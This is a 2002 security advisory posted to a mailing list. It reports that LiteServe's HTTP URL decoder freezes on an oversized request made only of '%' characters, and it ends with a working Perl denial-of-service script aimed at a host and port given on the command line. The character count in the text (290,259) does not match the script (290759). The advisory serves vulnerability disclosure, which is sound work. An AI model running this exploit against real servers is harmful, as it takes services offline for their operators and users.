From: Matthew Murphy (mattmurphy_at_kc.rr.com)
Date: Sun Nov 17 2002 - 15:29:53 CST
Christopher Fillion's Perception offers LiteServe, the server suite that has
recently been the subject of intensive security research. Another
vulnerability has been discovered in LiteServe. The vulnerability this time
lies in LiteServe's URL decoder, once again part of the HTTP service.
LiteServe's URL decoder has a problem handling illegal "%xx" sequences, such
as "%.", for example, and may produce corrupted output when such a sequence
is used. The problem appears to be a referencing issue when the decode
sequence does not specify a legitimate hexadecimal sequence. A denial of
service may occur if LiteServe is passed an extremely large request
consisting only of "%" characters. 290,259 such characters will cause
LiteServe to freeze:
GET /[buffer] HTTP/1.0
After this request is processed, attempting to connect to the HTTP service
reveals that the server is dead.
Exploit:
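#!/usr/bin/perl
use IO::Socket;
# Request path made up solely of "%" characters
$buffer="%"x290759;
# Place the buffer in the request line: GET /[buffer] HTTP/1.0
$req=sprintf("GET /%s HTTP/1.0\r\n\r\n",$buffer);
# Host and port are taken from the command line
$f=IO::Socket::INET->new(PeerAddr=>$ARGV[0],PeerPort=>$ARGV[1],Proto=>"tcp");
print $f $req;
undef $f;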